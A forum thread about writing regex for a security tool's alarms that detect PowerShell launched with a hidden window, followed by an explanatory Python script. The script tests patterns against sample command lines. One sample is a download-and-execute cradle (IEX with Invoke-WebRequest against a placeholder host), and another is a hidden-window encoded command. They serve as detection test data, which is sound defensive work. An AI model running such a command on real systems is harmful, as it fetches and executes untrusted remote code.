What is the proper RegEx format for Field Match alarms? I'm trying to implement a very simple RegEx match for the word "hidden", case insensitive. Normally this would just be /(hidden)/i, but it doesn't seem to work in the Field Match alarm section.
The filter for "hidden" or "Hidden" seems to work fine, so I've narrowed the problem down to the RegEx match, not the alarm logic itself.
For context, this is parsing PowerShell logs to look for PS execution trying to hide the window.
Hey Andy, thanks for the reply. I tried on the "D" character instead; no dice.
And the event:
Edit: After some fiddling, this worked. Thank you. How do I implement other RegEx functions, like "ends with", for example? The traditional dollar sign after the text doesn't seem to work. Is there a standard format of RegEx that the field match is expecting?
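The thread does not say which regex engine sits behind the Field Match box, so the following is an added example (not part of the thread, and not the product's own code) built on one assumption: that the field takes a bare pattern string rather than a JavaScript-style `/pattern/flags` literal, which is how most non-JavaScript engines (Python's `re`, Go's RE2, PCRE, Java) take their input. Under that assumption the slashes and the trailing `i` in `/(hidden)/i` become literal characters, which is exactly the "filter works, regex doesn't" symptom described above. The script below runs the patterns over a few constructed PowerShell command lines with Python's `re` to show the JS-literal form failing, the inline `(?i)` flag working, a tighter match on the `-WindowStyle Hidden` switch, and why a plain `$` "ends with" anchor misses a value logged with trailing whitespace. The sample events are made up for the example.

```python
import re

# Constructed sample PowerShell process-creation command lines for the demo.
# They are made up for this example, not taken from the thread or any real log.
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgA",
    'POWERSHELL.EXE -w hidden -c "IEX (iwr http://example.invalid/a)"',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Backup.ps1",
    "powershell.exe -File C:\\Scripts\\Cleanup.ps1 ",  # trailing space, as some collectors log it
    "pwsh.exe -NonInteractive -Command Get-Process",
]


def field_match(pattern: str, events=SAMPLE_EVENTS):
    """Return the events whose text matches `pattern`.

    The pattern is treated as a bare regex: no surrounding /.../ delimiters and
    no trailing flag letters. Flags go inline, e.g. (?i) for case-insensitive.
    re.search is unanchored, so the pattern may occur anywhere in the field
    unless the pattern itself uses ^ or $.
    """
    rx = re.compile(pattern)
    return [e for e in events if rx.search(e)]


# 1. The JavaScript-literal form. In a bare-pattern engine the two slashes and
#    the trailing "i" are literal characters, so the pattern only matches text
#    containing "/hidden/i" and nothing in the sample fires.
JS_STYLE = r"/(hidden)/i"

# 2. Case-insensitive via the inline flag instead of a trailing /i.
INLINE_FLAG = r"(?i)hidden"

# 3. Tighter: only the WindowStyle switch (long "-WindowStyle" or short "-w"
#    form), so an unrelated "hidden" elsewhere in the command line won't fire.
WINDOW_STYLE_HIDDEN = r"(?i)-w(?:indowstyle)?\s+hidden\b"

# 4. "Ends with": $ anchors to the end of the field value. If the collector
#    stored the value with trailing whitespace, a plain $ will not match;
#    allowing optional whitespace before the anchor covers both cases.
ENDS_WITH_PS1_STRICT = r"(?i)\.ps1$"
ENDS_WITH_PS1 = r"(?i)\.ps1\s*$"


if __name__ == "__main__":
    for name, pat in [
        ("js-style", JS_STYLE),
        ("inline-flag", INLINE_FLAG),
        ("windowstyle", WINDOW_STYLE_HIDDEN),
        ("ends-with-strict", ENDS_WITH_PS1_STRICT),
        ("ends-with", ENDS_WITH_PS1),
    ]:
        hits = field_match(pat)
        print(f"{name:17} {pat!r}: {len(hits)} hit(s)")
        for h in hits:
            print("    ", h)
```

If the product's box does behave this way, the practical rule is: drop the delimiters, put flags inline with `(?i)`, and when `$` seems not to work, check the raw field value for trailing whitespace or a newline before blaming the engine. If the box turns out to be a plain substring filter with a separate regex toggle, none of the above applies, so test the bare pattern first.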